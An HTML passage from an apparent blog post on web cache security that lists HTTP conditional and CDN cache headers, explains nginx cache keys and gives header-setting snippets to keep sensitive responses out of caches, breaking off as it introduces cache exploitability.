These headers are described in the <a href="https://tools.ietf.org/html/rfc7232" target="_blank">RFC7232</a>, some of them follows:</p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="289"></col><col width="261"></col></colgroup><tbody><tr style="height: 21pt;"><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Header</span></p></td><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Definition</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-Match</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">entity-tag</span></p></td></tr><tr style="height: 19.5pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-None-Match</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">entity-tag</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-Modified-Since</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP-date timestamp</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-Unmodified-Since</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP-date timestamp</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-Range</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">entity-tag / HTTP-date timestamp</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(https://tools.ietf.org/html/rfc7233#section-3.2)</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">ETag</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">entity-tag</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">weak</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">opaque-tag</span></p>
<p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">etagc</span></p></td></tr></tbody></table></div><p><br /></p><p>In <a href="https://docs.fastly.com/en/guides/understanding-cache-hit-and-miss-headers-with-shielded-services" target="_blank">some</a> <a href="https://cf-cache-status.net/" target="_blank">specific</a> <a href="https://getfishtank.ca/blog/cloudflare-cdn-cf-cache-status-headers-explained" target="_blank">cases</a>, the following<b> custom caching headers</b> can be implemented in the response when a communication relies on a <i>CDN</i> or a<i> reverse proxy server</i>:</p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="289"></col><col width="261"></col></colgroup><tbody><tr style="height: 21pt;"><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Header</span></p></td><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Definition</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">CF-Cache-Status</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">used by CloudFlare CDN in order to provide user the web page caching-state</span></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Drupal-Cache</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">used by Drupal CMS in order to provide user the web page caching-state</span></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache-Status</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">used by NGINX reverse proxy in order to provide user the web page caching-state</span></p><br /></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Proxy-Cache</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">enables the web-page caching in NGINX reverse proxy</span></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">general custom header used by CDNs in order to provide user the web page caching-state</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Served-By</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache-Hits</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“X-Served-By” header lists nodes which provide a web page cache copy</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> (i.e. “node1-cacheserver, </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">node2-cacheserver, external-node-cacheserver”);</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“X-Cache-Hits” specifies which of the listed hosts provides the actual cache </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">copy (i.e. in case of “node2-cacheserver”, </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">the header would be “0, 1, 0”)</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cacheable</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">general custom caching header</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache-Enabled</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">general custom status caching header</span></p></td></tr></tbody></table></div><p><br /></p><p>These headers play an important role in the web cache exploitability context, since they can be used by a malicious user in order to obtain additional information related to the aimed cache/web server and framework in use.</p>
<br />
<h3>A Suitable WebServer Configuration</h3>
<p>As described in the <i>RFC7234</i> <a href="https://tools.ietf.org/html/rfc7234#section-2" target="_blank">section 2</a> and <a href="https://tools.ietf.org/html/rfc7234#section-3" target="_blank">section 3</a>, within a web server configuration, the<b> logical control</b> of the web page “<i>changed-state</i>” is assigned to specific headers inside the request. These headers are also known as “<i><b>cache keys</b></i>”.
<br /><br />
For instance, a “<i>Nginx</i>” web server configured as “<a href="https://docs.nginx.com/nginx/admin-guide/content-cache/content-caching/" target="_blank">Content Caching</a>” uses by default the following cache keys:
</p><ul>
<li><b>- headers</b> (i.e. <i>Accept-Language, Host, User-Agent, Accept-Encoding</i>);</li>
<li><b>- cookies</b>;</li>
<li><b>- resources path</b>;</li>
<li><b>- URL query</b>.</li>
</ul>
Once the cache server finds a different <i>cache key</i> value <i>within the header</i>, it will process it as a brand new web page, until its expiration. <br /><br />
Beyond <i>cache keys</i>, the basis of a web cache configuration is a suitable <b>web server </b>setup which provides the following <b>basic rules</b> in order to avoid to cache<b> custom responses with sensitive information</b> or <i>dynamic documents</i>:
<span id="docs-internal-guid-aeec537a-7fff-6057-a32e-87d051f3e6da"><br /><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># If you are using the HTTP 1.0 protocol (you are a bad person in this case, you should </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># disable it since it has been deprecated!) the following instruction enables the </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># “Expires: 0” header limits the detention of the cache response to 0 seconds:</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">httpResponse.setDateHeader("Expires", 0);</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># If you are using the HTTP 1.0 protocol, the following instruction disables the web </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># response caching:</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">httpResponse.setHeader("Pragma", "no-cache");</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># For further HTTP protocols (v1.1, v1.2 and v1.3), please refer to the following rule</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># in order to disable the web resource caching:</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">httpResponse.setHeader("Cache-Control", "no-cache,must-revalidate");</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># For further HTTP protocols (v1.1, v1.2 and v1.3), if you are using a proxy or a </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># reverse-proxy, do not cache the required resource within but relies exclusively on the </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># web server version:</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">httpResponse.addHeader("Cache-Control", "proxy-revalidate");</span></p></td></tr></tbody></table></div></span><br />In order to provide a fine-tuned configuration, for a more in-depth analysis as regards the custom caching headers, you can refer to the following official providers guides:
<ul>
<li>- <a href="https://www.nginx.com/blog/nginx-caching-guide/" target="_blank">NGINX Caching guide</a>;</li>
<li>- <a href="https://httpd.apache.org/docs/2.4/caching.html" target="_blank">Apache Caching Guide</a>;</li>
<li>- Akamai Caching Guide: <a href="https://developer.akamai.com/blog/2017/03/28/what-you-need-know-about-caching-part-1" target="_blank">Part 1</a>,<a href="https://developer.akamai.com/blog/2017/04/06/what-you-need-know-about-caching-part-2" target="_blank"> Part 2</a>, <a href="Part 3" target="_blank">Part 3</a>;</li>
<li>- <a href="https://support.cloudflare.com/hc/en-us/articles/115003206852-Understanding-Origin-Cache-Control" target="_blank">Cloudflare Caching Guide</a>;</li>
<li>- <a href="https://docs.fastly.com/en/guides/configuring-caching" target="_blank">Fastly Caching Guide.</a></li>
</ul>
<p></p>
<br />
<h3>Web Cache Exploitability</h3>
<p>The web-cache headers might sometimes be part of the problem related to web cache security <i>issues</i>.<br />
For example, an attacker might abuse a requested path to create a <b>type confusion flaw </b>within a misconfigured server-side web cache storage leading, for instance, to <b>user data exfiltration</b> and that might happen even if the response headers related to the cache are properly configured.<br /><br />
As shown in the following table, there can be multiple gateways layers composing a web infrastructure. Each of these layers handles the web cache server according to its own rules.
<br /><br />
